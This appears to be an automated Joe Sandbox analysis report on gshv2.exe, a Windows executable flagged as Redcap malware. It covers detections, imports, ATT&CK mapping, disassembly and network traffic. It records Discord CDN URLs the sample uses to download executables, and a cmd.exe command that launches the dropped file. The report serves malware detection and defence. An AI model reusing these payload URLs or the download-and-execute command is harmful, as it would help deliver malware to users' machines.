Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0CFF4C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF62C0CFF4C
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0D00D0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF62C0D00D0
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0C73E0 mouse_event,mouse_event,mouse_event,0_2_00007FF62C0C73E0
Source: C:\Users\user\Desktop\gshv2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\System32\dxd32s.exeJump to behavior
Source: C:\Users\user\Desktop\gshv2.exeCode function: 0_2_00007FF62C0D04F0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF62C0D04F0
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API
1
DLL Side-Loading
11
Process Injection
11
Process Injection
21
Input Capture
1
System Time Discovery
Remote Services21
Input Capture
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Obfuscated Files or Information
LSASS Memory11
Security Software Discovery
Remote Desktop Protocol1
Archive Collected Data
14
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager2
System Information Discovery
SMB/Windows Admin Shares3
Clipboard Data
3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
gshv2.exe68%VirustotalBrowse
gshv2.exe55%ReversingLabsWin64.Adware.RedCap
gshv2.exe100%AviraTR/Redcap.odhte
gshv2.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
cdn.discordapp.com
162.159.129.233
truefalse
    high
    NameMaliciousAntivirus DetectionReputation
    https://cdn.discordapp.com/attachments/1019415395452588092/1019417039519092736/dxd32s.exefalse
      high
      https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exefalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        https://cdn.discordapp.com/attachments/1019415395452588092/1019417039519092736/dxd32s.exendowsFgshv2.exe, 00000000.00000002.1759636616.0000021F5385B000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exe:gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exe03:21:08gshv2.exefalse
              high
              https://cdn.discordapp.com/gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exe.gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://cdn.discordapp.com/Lgshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://cdn.discordapp.com/attachments/1019415395452588092/1019417039519092736/dxd32s.exeC:gshv2.exefalse
                      high
                      https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exergshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://cdn.discordapp.com/attachments/926255566924447794/952693608832708628/chrome.exe11gshv2.exe, 00000000.00000002.1759636616.0000021F53898000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://cdn.discordapp.com/attachments/1019415395452588092/1019417039519092736/dxd32s.exergshv2.exe, 00000000.00000003.1666174920.0000021F538E2000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            162.159.129.233
                            cdn.discordapp.comUnited States
                            13335CLOUDFLARENETUSfalse
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1581356
                            Start date and time:2024-12-27 13:34:07 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 2m 13s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:3
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:gshv2.exe
                            Detection:MAL
                            Classification:mal68.winEXE@4/1@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 4
                            • Number of non-executed functions: 67
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            No simulations
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            162.159.129.233Cheat_Lab_2.7.2.msiGet hashmaliciousUnknownBrowse
                            • cdn.discordapp.com/attachments/1175364766026436628/1175364839565176852/2
                            Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                            • cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
                            QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • cdn.discordapp.com/attachments/1152164172566630421/1153564703793107036/Rezyurp.exe
                            SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • cdn.discordapp.com/attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bin
                            64AE5410F978DF0F48DCC67508820EA230C566967E002.exeGet hashmaliciousDCRatBrowse
                            • cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                            http://162.159.129.233Get hashmaliciousUnknownBrowse
                            • 162.159.129.233/favicon.ico
                            2lfV6QiE6j.exeGet hashmaliciousUnknownBrowse
                            • cdn.discordapp.com/attachments/937614907917078588/937618926945329213/macwx.log
                            SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeGet hashmaliciousAmadeyBrowse
                            • cdn.discordapp.com/attachments/878034206570209333/908810886561534042/slhost.exe
                            1PhgF7ujwW.exeGet hashmaliciousAmadeyBrowse
                            • cdn.discordapp.com/attachments/878382243242983437/879280740578263060/FastingTabbied_2021-08-23_11-26.exe
                            vhNyVU8USk.exeGet hashmaliciousAmadeyBrowse
                            • cdn.discordapp.com/attachments/837741922641903637/866064264027701248/svchost.exe
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            cdn.discordapp.comPO_11171111221.Vbs.vbsGet hashmaliciousFormBookBrowse
                            • 162.159.129.233
                            WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                            • 162.159.129.233
                            sNifdpWiY9.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                            • 162.159.134.233
                            EsgeCzT4do.exeGet hashmaliciousXWormBrowse
                            • 162.159.129.233
                            file.exeGet hashmaliciousUnknownBrowse
                            • 162.159.135.233
                            file.exeGet hashmaliciousCStealerBrowse
                            • 162.159.134.233
                            https://cdn.discordapp.com/attachments/1284277835762110544/1305291734967779460/emu.exe?ex=67327f28&is=67312da8&hm=ea20e1c2a609dc1a0569bd4abb7e0da0a5e0671f3f7a388c1ed138f806c8e0c4&Get hashmaliciousUnknownBrowse
                            • 162.159.135.233
                            SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeGet hashmaliciousXmrigBrowse
                            • 162.159.135.233
                            segura.vbsGet hashmaliciousRemcosBrowse
                            • 162.159.135.233
                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                            • 162.159.129.233
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CLOUDFLARENETUSOiMp3TH.exeGet hashmaliciousLummaCBrowse
                            • 172.67.216.236
                            https://dnsextension.pro/invoice/d2d0bf8701b34bc296ca83b956c10720Get hashmaliciousUnknownBrowse
                            • 104.21.31.138
                            k0ukcEH.exeGet hashmaliciousLummaCBrowse
                            • 172.67.157.254
                            appFile.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.94.92
                            FloydMounts.exeGet hashmaliciousLummaC StealerBrowse
                            • 104.21.25.41
                            5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                            • 172.67.165.185
                            0A7XTINw3R.exeGet hashmaliciousUnknownBrowse
                            • 104.26.8.44
                            RDb082EApV.exeGet hashmaliciousLummaCBrowse
                            • 104.21.11.101
                            GnHq2ZaBUl.exeGet hashmaliciousLummaCBrowse
                            • 104.21.11.101
                            vVJvxAfBDM.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                            • 104.21.11.101
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            37f463bf4616ecd445d4a1937da06e19DOTA2#U89c6#U8ddd#U63d2#U4ef6.exeGet hashmaliciousUnknownBrowse
                            • 162.159.129.233
                            n5Szx8qsFB.lnkGet hashmaliciousUnknownBrowse
                            • 162.159.129.233
                            InExYnlM0N.lnkGet hashmaliciousUnknownBrowse
                            • 162.159.129.233
                            K9esyY0r4G.lnkGet hashmaliciousUnknownBrowse
                            • 162.159.129.233
                            vreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                            • 162.159.129.233
                            aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                            • 162.159.129.233
                            installer.batGet hashmaliciousVidarBrowse
                            • 162.159.129.233
                            skript.batGet hashmaliciousVidarBrowse
                            • 162.159.129.233
                            din.exeGet hashmaliciousVidarBrowse
                            • 162.159.129.233
                            yoda.exeGet hashmaliciousVidarBrowse
                            • 162.159.129.233
                            No context
                            Process:C:\Users\user\Desktop\gshv2.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):30
                            Entropy (8bit):3.911080496244278
                            Encrypted:false
                            SSDEEP:3:43FhlRLLcv:5v
                            MD5:C1C449569C7F1CA92C57DE05C38E6A3B
                            SHA1:287DE503E38632FA73A477A372F19F0D646307A0
                            SHA-256:4C7A4EF68BC5809FACA2AB18DA4A8B8874E565BACBD9B61DC3BADD8B8997BE67
                            SHA-512:3C5F585FC8BE8EBB0D75C4F1FA4715C9112ACEE4B303CDDFFE4E2E3DBBCC79C01B3A0882B96AA8EFDEBE9DA4EEE3020B12F70624A96768952CBDDB5F32B3D99D
                            Malicious:false
                            Reputation:low
                            Preview: [+] Driver Did Not Start.....
                            File type:PE32+ executable (console) x86-64, for MS Windows
                            Entropy (8bit):6.527801780732871
                            TrID:
                            • Win64 Executable Console (202006/5) 92.65%
                            • Win64 Executable (generic) (12005/4) 5.51%
                            • Generic Win/DOS Executable (2004/3) 0.92%
                            • DOS Executable Generic (2002/1) 0.92%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:gshv2.exe
                            File size:254'976 bytes
                            MD5:27f0e3dbf939ae14775e062a8445f0e5
                            SHA1:502104b0540cf3a031c7d1aa3704946bdc253b72
                            SHA256:7536d907def00cb0b8948d7651697a670d15b85545480931ea6de7f637ea4502
                            SHA512:ec758a028d04b69b7550f98fb25ee4e84ae69b90b7e83ccf6f7a5e1750f74980bc8beacddbcee042b99a2e03dc286dfdff96216778b2a319abfeab2daf560dfb
                            SSDEEP:6144:6jQKxscJFJ8bJSCJRrGCBuDyCafW1/7pbaqo4VMhhMGSGlEantaAetFqJj:6sMtfeUYB9W1/7pbaqo4VMhqGGangAe2
                            TLSH:8F446C8571E44DF9E8AA4079909AB30FF9363C48072096CB73E8455A2FF37E05AFE255
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................*.....................................................Z.......Z.F.....Z.......Rich...........................
                            Icon Hash:90cececece8e8eb0
                            Entrypoint:0x14002ff38
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x140000000
                            Subsystem:windows cui
                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x63212C89 [Wed Sep 14 01:21:13 2022 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:0
                            File Version Major:6
                            File Version Minor:0
                            Subsystem Version Major:6
                            Subsystem Version Minor:0
                            Import Hash:75ba8e041b85918858b336a0a4ef1d7b
                            Instruction
                            dec eax
                            sub esp, 28h
                            call 00007FA9AC7FDE64h
                            dec eax
                            add esp, 28h
                            jmp 00007FA9AC7FD727h
                            int3
                            int3
                            inc eax
                            push ebx
                            dec eax
                            sub esp, 20h
                            dec eax
                            mov ebx, ecx
                            xor ecx, ecx
                            call dword ptr [000021A3h]
                            dec eax
                            mov ecx, ebx
                            call dword ptr [00002192h]
                            call dword ptr [0000219Ch]
                            dec eax
                            mov ecx, eax
                            mov edx, C0000409h
                            dec eax
                            add esp, 20h
                            pop ebx
                            dec eax
                            jmp dword ptr [00002190h]
                            dec eax
                            mov dword ptr [esp+08h], ecx
                            dec eax
                            sub esp, 38h
                            mov ecx, 00000017h
                            call dword ptr [00002184h]
                            test eax, eax
                            je 00007FA9AC7FD8B9h
                            mov ecx, 00000002h
                            int 29h
                            dec eax
                            lea ecx, dword ptr [0000DACAh]
                            call 00007FA9AC7FD95Eh
                            dec eax
                            mov eax, dword ptr [esp+38h]
                            dec eax
                            mov dword ptr [0000DBB1h], eax
                            dec eax
                            lea eax, dword ptr [esp+38h]
                            dec eax
                            add eax, 08h
                            dec eax
                            mov dword ptr [0000DB41h], eax
                            dec eax
                            mov eax, dword ptr [0000DB9Ah]
                            dec eax
                            mov dword ptr [0000DA0Bh], eax
                            dec eax
                            mov eax, dword ptr [esp+40h]
                            dec eax
                            mov dword ptr [0000DB0Fh], eax
                            mov dword ptr [0000D9E5h], C0000409h
                            mov dword ptr [0000D9DFh], 00000001h
                            mov dword ptr [0000D9E9h], 00000001h
                            Programming Language:
                            • [IMP] VS2008 SP1 build 30729
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3b65c0x154.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x420000x1e8.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x3f0000x2148.pdata
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x430000xb4.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x378300x38.rdata
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x378800x28.rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x376f00x140.rdata
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x320000x550.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x3051a0x306001970c74cf237ee6d7a28b3d23a2ec9ffFalse0.5273185158268734data6.415128638716904IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x320000xa9100xaa0066375af56df5aa01a2dc8d19b9896faeFalse0.5642233455882353data6.203891402049001IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x3d0000x15f00xa00a462543bfd99abb2aade1fb127db8681False0.33984375data3.8962215563242455IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .pdata0x3f0000x21480x2200861186c329b2e2c74f22e320b68b0620False0.4568014705882353data5.495571607115991IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .rsrc0x420000x1e80x20043c22ac8647ebbb96b2605592cfe3000False0.537109375data4.754815332235538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x430000xb40x2003a1fc5634efbebfedf5fe2d9566c5e16False0.32421875data2.305056545353035IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_MANIFEST0x420600x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                            DLLImport
                            dwmapi.dllDwmExtendFrameIntoClientArea
                            KERNEL32.dllGlobalLock, GlobalUnlock, QueryPerformanceFrequency, QueryPerformanceCounter, SetConsoleTextAttribute, SetConsoleTitleA, GetStdHandle, DeviceIoControl, CreateFileW, Sleep, GetLastError, CloseHandle, CreateThread, FormatMessageA, EnterCriticalSection, LeaveCriticalSection, GlobalAlloc, DeleteCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, GetModuleHandleW, GetProcAddress, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetCurrentProcessId, GlobalFree, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetSystemTimeAsFileTime, InitializeSListHead
                            USER32.dllCreateWindowExA, GetAsyncKeyState, ShowWindow, SetWindowPos, DestroyWindow, GetWindowRect, GetWindowLongA, GetWindow, GetWindowThreadProcessId, GetForegroundWindow, TranslateMessage, mouse_event, PeekMessageA, PostQuitMessage, MoveWindow, DispatchMessageA, DefWindowProcA, FindWindowA, RegisterClassExA, UpdateWindow, GetKeyState, LoadCursorA, ScreenToClient, SetWindowLongA, SetClipboardData, GetClipboardData, EmptyClipboard, CloseClipboard, OpenClipboard, GetCursorPos, SetCursorPos, ReleaseCapture, GetClientRect, SetCursor, GetActiveWindow, GetCapture, ClientToScreen, SetCapture
                            IMM32.dllImmSetCompositionWindow, ImmGetContext, ImmReleaseContext
                            MSVCP140.dll?_Xout_of_range@std@@YAXPEBD@Z, ?_Xlength_error@std@@YAXPEBD@Z
                            d3d9.dllDirect3DCreate9Ex
                            urlmon.dllURLDownloadToFileW, URLDownloadToFileA
                            VCRUNTIME140_1.dll__CxxFrameHandler4
                            VCRUNTIME140.dll_CxxThrowException, memset, __C_specific_handler, __current_exception_context, __current_exception, __std_exception_copy, __std_exception_destroy, strchr, strstr, __std_terminate, memchr, memcpy, memmove
                            api-ms-win-crt-stdio-l1-1-0.dllfflush, __acrt_iob_func, fseek, ftell, __stdio_common_vfprintf, fwrite, __stdio_common_vsprintf, fclose, fread, __stdio_common_vsscanf, _wfopen, __stdio_common_vsprintf_s, _set_fmode, __p__commode
                            api-ms-win-crt-string-l1-1-0.dllstrcmp
                            api-ms-win-crt-utility-l1-1-0.dllqsort, rand
                            api-ms-win-crt-heap-l1-1-0.dllfree, _callnewh, malloc, _set_new_mode
                            api-ms-win-crt-runtime-l1-1-0.dll__p___argc, __p___argv, _c_exit, _register_thread_local_exe_atexit_callback, _exit, _initterm_e, _initterm, _get_initial_narrow_environment, _invalid_parameter_noinfo_noreturn, terminate, _set_app_type, _seh_filter_exe, exit, _cexit, _configure_narrow_argv, system, _initialize_narrow_environment, _crt_atexit, _initialize_onexit_table, _register_onexit_function
                            api-ms-win-crt-math-l1-1-0.dllceilf, pow, fmodf, floorf, powf, sinf, sqrt, __setusermatherr, asinf, tanf, sqrtf, cosf
                            api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States
                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-12-27T13:34:57.890716+01002022550ET MALWARE Possible Malicious Macro DL EXE Feb 20161192.168.2.449732162.159.129.233443TCP
                            TimestampSource PortDest PortSource IPDest IP
                            Dec 27, 2024 13:34:56.020137072 CET49732443192.168.2.4162.159.129.233
                            Dec 27, 2024 13:34:56.020179033 CET44349732162.159.129.233192.168.2.4
                            Dec 27, 2024 13:34:56.020262957 CET49732443192.168.2.4162.159.129.233
                            Dec 27, 2024 13:34:56.028577089 CET49732443192.168.2.4162.159.129.233
                            Dec 27, 2024 13:34:56.028593063 CET44349732162.159.129.233192.168.2.4
                            Dec 27, 2024 13:34:57.342452049 CET44349732162.159.129.233192.168.2.4
                            Dec 27, 2024 13:34:57.342526913 CET49732443192.168.2.4162.159.129.233
                            Dec 27, 2024 13:34:57.499670982 CET49732443192.168.2.4162.159.129.233
                            Dec 27, 2024 13:34:57.499712944 CET44349732162.159.129.233192.168.2.4
                            Dec 27, 2024 13:34:57.500102997 CET44349732162.159.129.233192.168.2.4
                            Dec 27, 2024 13:34:57.500157118 CET49732443192.168.2.4162.159.129.233
                            Dec 27, 2024 13:34:57.503518105 CET49732443192.168.2.4162.159.129.233
                            Dec 27, 2024 13:34:57.551338911 CET44349732162.159.129.233192.168.2.4
                            Dec 27, 2024 13:34:57.890737057 CET44349732162.159.129.233192.168.2.4
                            Dec 27, 2024 13:34:57.890796900 CET44349732162.159.129.233192.168.2.4
                            Dec 27, 2024 13:34:57.890799046 CET49732443192.168.2.4162.159.129.233
                            Dec 27, 2024 13:34:57.890841961 CET49732443192.168.2.4162.159.129.233
                            Dec 27, 2024 13:34:57.898185015 CET49732443192.168.2.4162.159.129.233
                            Dec 27, 2024 13:34:57.898205042 CET44349732162.159.129.233192.168.2.4
                            Dec 27, 2024 13:34:57.898212910 CET49732443192.168.2.4162.159.129.233
                            Dec 27, 2024 13:34:57.898256063 CET49732443192.168.2.4162.159.129.233
                            Dec 27, 2024 13:35:03.542129993 CET49733443192.168.2.4162.159.129.233
                            Dec 27, 2024 13:35:03.542222023 CET44349733162.159.129.233192.168.2.4
                            Dec 27, 2024 13:35:03.542365074 CET49733443192.168.2.4162.159.129.233
                            Dec 27, 2024 13:35:03.542601109 CET49733443192.168.2.4162.159.129.233
                            Dec 27, 2024 13:35:03.542637110 CET44349733162.159.129.233192.168.2.4
                            Dec 27, 2024 13:35:04.753602982 CET44349733162.159.129.233192.168.2.4
                            Dec 27, 2024 13:35:04.754847050 CET49733443192.168.2.4162.159.129.233
                            Dec 27, 2024 13:35:04.755274057 CET49733443192.168.2.4162.159.129.233
                            Dec 27, 2024 13:35:04.755296946 CET44349733162.159.129.233192.168.2.4
                            Dec 27, 2024 13:35:04.755484104 CET49733443192.168.2.4162.159.129.233
                            Dec 27, 2024 13:35:04.755496025 CET44349733162.159.129.233192.168.2.4
                            Dec 27, 2024 13:35:05.206065893 CET44349733162.159.129.233192.168.2.4
                            Dec 27, 2024 13:35:05.206119061 CET44349733162.159.129.233192.168.2.4
                            Dec 27, 2024 13:35:05.206202030 CET49733443192.168.2.4162.159.129.233
                            Dec 27, 2024 13:35:05.210676908 CET49733443192.168.2.4162.159.129.233
                            Dec 27, 2024 13:35:05.210676908 CET49733443192.168.2.4162.159.129.233
                            Dec 27, 2024 13:35:05.210726023 CET44349733162.159.129.233192.168.2.4
                            Dec 27, 2024 13:35:05.210982084 CET49733443192.168.2.4162.159.129.233
                            TimestampSource PortDest PortSource IPDest IP
                            Dec 27, 2024 13:34:55.876647949 CET5019553192.168.2.41.1.1.1
                            Dec 27, 2024 13:34:56.013935089 CET53501951.1.1.1192.168.2.4
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Dec 27, 2024 13:34:55.876647949 CET192.168.2.41.1.1.10x40a8Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Dec 27, 2024 13:34:56.013935089 CET1.1.1.1192.168.2.40x40a8No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                            Dec 27, 2024 13:34:56.013935089 CET1.1.1.1192.168.2.40x40a8No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                            Dec 27, 2024 13:34:56.013935089 CET1.1.1.1192.168.2.40x40a8No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                            Dec 27, 2024 13:34:56.013935089 CET1.1.1.1192.168.2.40x40a8No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                            Dec 27, 2024 13:34:56.013935089 CET1.1.1.1192.168.2.40x40a8No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                            • cdn.discordapp.com
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.449732162.159.129.2334436096C:\Users\user\Desktop\gshv2.exe
                            TimestampBytes transferredDirectionData
                            2024-12-27 12:34:57 UTC359OUTGET /attachments/1019415395452588092/1019417039519092736/dxd32s.exe HTTP/1.1
                            Accept: */*
                            UA-CPU: AMD64
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                            Host: cdn.discordapp.com
                            Connection: Keep-Alive
                            2024-12-27 12:34:57 UTC1064INHTTP/1.1 404 Not Found
                            Date: Fri, 27 Dec 2024 12:34:57 GMT
                            Content-Type: text/plain;charset=UTF-8
                            Content-Length: 36
                            Connection: close
                            Set-Cookie: __cf_bm=Ml3sgB8EA3OYOvAD7HbKsuUU9dolwk27rqJ25I_20zs-1735302897-1.0.1.1-GcZjiQkzq_IkER7Qy3.0SVunBneZhYGBKljSSIoZ58.ftrtWgnFaqwaQsQdsUhnmfwjMZUWsRuu01ONHIb5Nlg; path=/; expires=Fri, 27-Dec-24 13:04:57 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=898Eminxt%2FiRtRfKNZ0XB8iQQMwMXXeNfTrElGiP02RY0Pk5KuItFVq%2F59fSQZ1tuBf7SlklTFbCKo9LAMEQuiQuMEp%2BwclXz8Y4nl8Gm%2FxZfWy5D0g6WEiQeQKliF16bRY2tA%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                            Set-Cookie: _cfuvid=LosZoUHKm3b7VGnY3l06DQjB0NBMkedqDPjXQQIWA24-1735302897726-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                            Server: cloudflare
                            CF-RAY: 8f8959067fb780e2-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-12-27 12:34:57 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                            Data Ascii: This content is no longer available.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.449733162.159.129.2334436096C:\Users\user\Desktop\gshv2.exe
                            TimestampBytes transferredDirectionData
                            2024-12-27 12:35:04 UTC609OUTGET /attachments/926255566924447794/952693608832708628/chrome.exe HTTP/1.1
                            Accept: */*
                            UA-CPU: AMD64
                            Accept-Encoding: gzip, deflate
